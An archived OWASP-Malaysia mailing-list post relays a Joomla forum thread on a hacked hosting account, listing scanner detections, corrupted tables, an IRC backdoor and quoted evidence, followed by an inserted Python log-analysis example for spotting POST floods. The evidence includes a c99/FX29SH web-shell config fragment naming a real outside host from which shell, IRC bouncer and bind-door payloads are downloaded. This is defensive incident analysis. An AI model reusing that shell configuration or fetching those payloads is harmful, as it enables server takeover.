[OWASP-Malaysia] Forum Post : Malware/Maybe Hack Causing Host Server to Get Overload

Harisfazillah Jamel linuxmalaysia at gmail.com
Wed Oct 19 08:00:13 EDT 2011


Team,

A forum post we can refer to, showing what the cracker(s) did to our servers.

http://forum.joomla.org/viewtopic.php?p=2518912&sid=1f09664d13627db3131ef72b6cccbc71#p2518912

One of the posts:

"You also need to remove every file, cron job, sub domains,
directories, etc. from your domain."
"mmmmmmmm, me thought that was done in the first place"

Site was restored from site backups which are infected.

I've downloaded the backups I have from cPanel, unzipped them and
scanned them with Norton anti-virus (I'm on a Mac). I did the same
with the public_HTML folder. The backups had trojans,

Take a closer look at some of the posts. While it is possible that the
server has another account hacked, it is likely originating from this
account. There are several scripts here

an injector script and an uploader script:

{HEX}base64.inject.unclassed.3 : ./media/system/cfg.php
{HEX}php.uploader.max.523 : ./media/system/upload.php

Evidence the hacker messed with or has attempted to mess with the database:

hableda1_jo151.jos_session
warning : Table is marked as crashed
warning : 1 client is using or hasn't closed the table properly
warning : Found 1128996 deleted space in delete link chain. Should be 1167464
error : Found 442 deleted rows in delete link chain. Should be 457

hableda1_jo151.jos_content
warning : 1 client is using or hasn't closed the table properly
status : OK
error : record delete-link-chain corrupted
error : Corrupt

Evidence that hacker has installed or linked to c99, and other scripts:

#$sh_mainurl = "http://localhost/FX29SH/";
$sh_mainurl = "http://uaedesign.com/xml/";
$fx29sh_updateurl = $sh_mainurl."c99_update.php";
$fx29sh_sourcesurl = $sh_mainurl."c99.txt";
$sh_sourcez = array(
"Fx29Sh" => array($sh_mainurl."c99.txt","c99.php"),
"psyBNC" => array($sh_mainurl."fx.tgz","fx.tgz"),
"Eggdrop" => array($sh_mainurl."fxb.tgz","fxb.tgz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),

Evidence of IRC installed and active:

A few updates: I've downloaded and scanned my backup that was just
generated and this virus was found in the homedir.tar and the
hableda1.tar.gz (I scanned both the zipped and unzipped files):
backdoor.IRC.bot.

Evidence the attempts to use the site for malware/spam/other purposes continue:

There are a lot of POST requests to the index page from the IP address
xxx.xxx.xxx.xxx

These are the reasons I stated what I did as a plan of action.
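The last piece of evidence in the thread, a stream of POST requests to the index page from one address, is easy to confirm from the web server's access log. Below is an added example for that check; it is not code from the forum post, and the log lines, IP addresses (documentation ranges) and thresholds are constructed for the illustration.

```python
import re
from collections import Counter
from datetime import datetime

# Apache/nginx "combined" log format, enough fields for this analysis.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
INDEX_PATHS = ("/", "/index.php")

# Constructed sample: a burst of POSTs from one source, normal browsing from another,
# and one malformed line the parser must skip rather than crash on.
SAMPLE_LOG = [
    '203.0.113.45 - - [19/Oct/2011:07:41:02 +0000] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [19/Oct/2011:07:41:03 +0000] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [19/Oct/2011:07:41:03 +0000] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Oct/2011:07:41:04 +0000] "GET / HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [19/Oct/2011:07:41:05 +0000] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    'this line is not in combined log format',
    '203.0.113.45 - - [19/Oct/2011:07:41:08 +0000] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Oct/2011:07:41:20 +0000] "POST /index.php?option=com_users HTTP/1.1" 303 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [19/Oct/2011:07:41:21 +0000] "GET /images/logo.png HTTP/1.1" 200 4411 "-" "Mozilla/5.0"',
    '203.0.113.45 - - [19/Oct/2011:07:42:30 +0000] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
]


def parse_line(line: str):
    """Return a dict of fields for a combined-format line, or None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def is_index_post(rec: dict) -> bool:
    """True for POST requests whose path (query string stripped) is the site index."""
    return rec["method"] == "POST" and rec["path"].split("?", 1)[0] in INDEX_PATHS


def count_index_posts(lines) -> Counter:
    """Count POSTs to the index page per source IP, skipping unparseable lines."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and is_index_post(rec):
            counts[rec["ip"]] += 1
    return counts


def peak_posts_per_window(lines, ip: str, window_seconds: int = 60) -> int:
    """Largest number of index POSTs from `ip` inside any sliding window of the given length."""
    times = sorted(
        datetime.strptime(rec["ts"], TS_FORMAT)
        for rec in map(parse_line, lines)
        if rec and rec["ip"] == ip and is_index_post(rec)
    )
    peak, start = 0, 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_seconds:
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def flag_sources(counts: Counter, threshold: int) -> list:
    """IPs whose index-POST count meets the threshold, sorted for stable output."""
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    counts = count_index_posts(SAMPLE_LOG)
    for ip in flag_sources(counts, threshold=5):
        print(f"{ip}: {counts[ip]} index POSTs, peak {peak_posts_per_window(SAMPLE_LOG, ip)} per minute")
```

The absolute count says who is hammering the page; the per-window peak separates a scripted burst from a legitimate user who posts a form a few times over a day. Feed it the real log with `count_index_posts(open("/var/log/apache2/access.log"))` and tune the threshold to the site's normal traffic before acting on the output.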

_______________


We can discuss this at OWASP.my Discussion Group In Facebook

https://www.facebook.com/groups/owaspmy/

